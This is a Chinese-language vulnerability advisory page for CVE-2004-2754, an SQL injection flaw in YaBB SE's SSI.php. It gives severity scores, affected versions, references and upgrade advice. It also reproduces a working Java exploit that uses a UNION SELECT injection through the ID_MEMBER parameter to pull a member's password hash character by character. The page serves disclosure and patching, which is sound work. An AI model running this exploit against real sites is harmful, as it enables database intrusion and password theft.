CVE-2004-2754
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:45:01
NMCOE    

[原文]SQL injection vulnerability in SSI.php in YaBB SE 1.5.4, 1.5.3, and possibly other versions before 1.5.5 allows remote attackers to execute arbitrary SQL commands via the ID_MEMBER parameter to the (1) recentTopics and (2) welcome functions.


[CNNVD]YABB SE SSI.php ID_MEMBER参数SQL注入漏洞(CNNVD-200412-200)

        
        Yabb Se是一款基于PHP/MySQL的论坛程序。
        Yabb Se包含的SSI.php没有充分过滤用户提交的URI参数,远程攻击者可以利用这个漏洞进行SQL注入攻击,可能获得敏感信息或修改数据库。
        SSI.php文件返回一些论坛最近论题,版面统计等一些信息,由于对ID_MEMBER参数缺少充分的过滤,攻击者可以提交恶意SQL命令,更改原有数据库逻辑,获得敏感信息或修改数据库。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-89 [SQL命令中使用的特殊元素转义处理不恰当(SQL注入)]

- CPE (受影响的平台与产品)

cpe:/a:yabb:yabb_se:1.5.3
cpe:/a:yabb:yabb_se:1.4.1
cpe:/a:yabb:yabb_se:1.5.4
cpe:/a:yabb:yabb_se:1.5.0
cpe:/a:yabb:yabb_se:1.5.2
cpe:/a:yabb:yabb_se:1.5.1_rc1
cpe:/a:yabb:yabb_se:1.1.3
cpe:/a:yabb:yabb_se:1.5.1
cpe:/a:yabb:yabb_se:0.8

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2754
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2754
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-200
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/9449
(PATCH)  BID  9449
http://sourceforge.net/project/shownotes.php?release_id=210608&group_id=57105
(PATCH)  MISC  http://sourceforge.net/project/shownotes.php?release_id=210608&group_id=57105
http://www.yabbse.org/community/index.php?thread=27122
(UNKNOWN)  MISC  http://www.yabbse.org/community/index.php?thread=27122
http://www.securitytracker.com/id?1008764
(UNKNOWN)  SECTRACK  1008764
http://www.securityfocus.com/archive/1/350244
(UNKNOWN)  BUGTRAQ  20040119 Yabb SE SQL Injection
http://www.osvdb.org/3618
(UNKNOWN)  OSVDB  3618
http://securityreason.com/securityalert/3371
(UNKNOWN)  SREASON  3371

- 漏洞信息

YABB SE SSI.php ID_MEMBER参数SQL注入漏洞
高危 输入验证
2004-12-31 00:00:00 2004-12-31 00:00:00
远程  
        
        Yabb Se是一款基于PHP/MySQL的论坛程序。
        Yabb Se包含的SSI.php没有充分过滤用户提交的URI参数,远程攻击者可以利用这个漏洞进行SQL注入攻击,可能获得敏感信息或修改数据库。
        SSI.php文件返回一些论坛最近论题,版面统计等一些信息,由于对ID_MEMBER参数缺少充分的过滤,攻击者可以提交恶意SQL命令,更改原有数据库逻辑,获得敏感信息或修改数据库。
        

- 公告与补丁

        厂商补丁:
        YaBB
        ----
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级到YABB SE 1.5.5:
        
        http://www.yabbse.org/community/index.php?thread=27122

- 漏洞信息 (23554)

YABB SE 1.x SSI.PHP ID_MEMBER SQL Injection Vulnerability (EDBID:23554)
php webapps
2004-01-19 Verified
0 BaCkSpAcE
N/A [点击下载]
source: http://www.securityfocus.com/bid/9449/info

A problem with YaBB SE could make it possible for a remote user launch SQL injection attacks.

It has been reported that a problem exists in the SSI.php script distributed as part of YaBB SE. Due to insufficient sanitizing of user-supplied URI parameters, it is possible for a remote user to inject arbitrary SQL queries into the database used by YaBB SE. This could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.

/*
* YabbSe SQL Injection test code
* The code is very ugly but it works OK
* Use at your own risk.
* compile:
* javac yabb.java
* exec:
* java yabb http://localhost/yabbse/yabbse154/ yabbse_ 1
* parameters are:
* java yabb [url with path] [database_prefix] [ID_MEMBER]
*/
import java.net.*;
import java.io.*;

public class yabb {
    public static void main(String[] args) throws Exception {

 boolean lastChar = false;
 String Key = "";

        for ( int count=1; count <= 32 ; count++)
        {
  URL yabbForum = new URL(args[0] +
"SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1%20OR%201=2)%20GROUP
%20BY%20readBy%20UNION%20SELECT%20ASCII(SUBSTRING(passwd,"+count+",1)%20)%20
%20,%20%200%20FROM%20"+args[1]+"members%20WHERE%20ID_MEMBER="+args[2]+"/*");

  BufferedReader in = new BufferedReader(new
InputStreamReader(yabbForum.openStream()));

  String inputLine;

  inputLine = in.readLine();

  int pos  = inputLine.indexOf("action=im");
  int pos2 = inputLine.indexOf(" ", pos + 11);

  if ( pos < 0 )
  {
   System.out.println("ERROR: The server doesn't return any data");
   System.exit(0);
  }

  String theNumber = inputLine.substring( pos + 11, pos2);

  System.out.println(theNumber + "-" + new
Character((char)Integer.parseInt(theNumber.trim())).toString());
  Key += new Character((char)Integer.parseInt(theNumber.trim())).toString();
  in.close();
 }
 System.out.println("Hashed password : " + Key);
    }
}
		

- 漏洞信息

3618
YaBB SE SSI.php ID_MEMBER Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity

- 漏洞描述

YaBB SE contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the ID_MEMBER variable in the SSI.php module is not verified properly and will allow an attacker to inject or manipulate SQL queries through the welcome or recentTopics functions.

- 时间线

2004-01-20 2004-01-19
Unknow Unknow

- 解决方案

Upgrade to version 1.5.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站